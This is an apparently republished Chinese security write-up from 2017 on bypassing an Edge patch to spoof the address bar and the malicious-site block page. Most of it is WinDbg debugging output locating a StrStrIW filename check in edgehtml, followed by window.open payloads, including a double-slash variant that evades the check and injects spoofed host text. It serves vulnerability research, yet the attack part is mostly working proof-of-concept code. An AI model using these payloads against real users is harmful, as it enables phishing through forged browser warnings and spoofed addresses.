本文讲的是
如何绕过Edge补丁欺骗浏览器地址栏和恶意网址检测?,
将大部分来源于本网站的漏洞都进行了修补。我很敬佩Edge的开发者以及它的安全研究员。对于那些想继续维持IE策略的开发者,我想你们应该至少公开说明你们为什么不维护它,要么让他停更,要么就继续维护他。
window.open("ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite.htm");
window.open("ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite%2ehtm?BlockedDomain=facebook.com");
0:029> lm m edgehtml Browse full module list start end module name 00007fff`54ba0000 00007fff`5614d000 edgehtml
0:029> s -[1]u 00007fff`54ba0000 00007fff`5614d000 "BlockSite" 0x00007fff`55d90846 0x00007fff`55d90944 0x00007fff`55e52c02
0:029> du 0x00007fff`55d90846; du 0x00007fff`55d90944; du0x00007fff`55e52c02 00007fff`55d90846 "BlockSite.htm" 00007fff`55d90944 "BlockSite.htm" 00007fff`55e52c02 "BlockSite.htm"
ba r1 0x00007fff`55d90846 ba r1 0x00007fff`55d90944 ba r1 0x00007fff`55e52c02 g (keep running, Edge!)
window.open("ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite%2ehtm?BlockedDomain=facebook.com");
Breakpoint 0 hit KERNELBASE!lstrlenW+0x18: 00007fff`74f6e2c8 75f6 jne KERNELBASE!lstrlenW+0x10 (00007fff`74f6e2c0) [br=1]
0:013> k 5 # Child-SP RetAddr Call Site 00 000000d3`14df8de8 00007fff`74f70244 KERNELBASE!lstrlenW+0x18 01 000000d3`14df8df0 00007fff`54fee629 KERNELBASE!StrStrIW+0x54 02 000000d3`14df8eb0 00007fff`55004e6b edgehtml!Ordinal107+0xc6059 03 000000d3`14df9f50 00007fff`55007272 edgehtml!Ordinal107+0xdc89b 04 000000d3`14df9f80 00007fff`55004cae edgehtml!Ordinal107+0xdeca2
bp edgehtml!Ordinal107+0xc6059 g
Breakpoint 3 hit edgehtml!Ordinal107+0xc6059: 00007fff`54fee629 4885c0 test rax,rax
0:013> ub $ip edgehtml!Ordinal107+0xc602d: 00007fff`54fee5fd lea rdx,[edgehtml!Ordinal138+0x3e4ff8 (00007fff`55d5e6b8)] 00007fff`54fee604 lea rcx,[rsp+30h] 00007fff`54fee609 call qword ptr [edgehtml!Ordinal138+0x38b5b8 (00007fff`55d04c78)] 00007fff`54fee60f test eax,eax 00007fff`54fee611 jne edgehtml!Ordinal107+0xc6108 (00007fff`54fee6d8) 00007fff`54fee617 lea rdx,[edgehtml!Ordinal138+0x417160] (Second Argument) 00007fff`54fee61e lea rcx,[rsp+30h] (First Argument) 00007fff`54fee623 call qword ptr [edgehtml!Ordinal138+0x38b5c8]
bd * (disable previous breakpoints) bp 00007fff`54fee623 g
window.open("ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite%2ehtm?BlockedDomain=facebook.com");
Breakpoint 4 hit edgehtml!Ordinal107+0xc6053: 00007fff`54fee623 call qword ptr [edgehtml!Ordinal138+0x38b5c8] ds:00007fff`55d04c88={KERNELBASE!StrStrIW (00007fff`74f701f0)}
0:013> du @rcx (First argument) 000000d3`14df8ee0 "ms-appx-web://microsoft.microsof" 000000d3`14df8f20 "tedge/assets/errorpages/BlockSit" 000000d3`14df8f60 "e.htm?BlockedDomain=facebook.com" 0:013> du @rdx (Second argument) 00007fff`55d90820 "/assets/errorPages/BlockSite.htm"
var url = "ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite.htm?BlockedDomain=facebook.com"; var badString = "/assets/errorPages/BlockSite.htm"; if (badString is inside URL) ACCESS_DENIED;
window.open("ms-appx-web://microsoft.microsoftedge/assets/errorpages//BlockSite.htm?BlockedDomain=facebook.com");
window.open("ms-appx-web://microsoft.microsoftedge/assets/errorpages//BlockSite.htm?BlockedDomain=facebook.com&Host=These guys at Facebook and in particular, Justin Rogers#http://www.facebook.com");
原文发布时间为:2017年3月20日
本文作者:xnianq
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。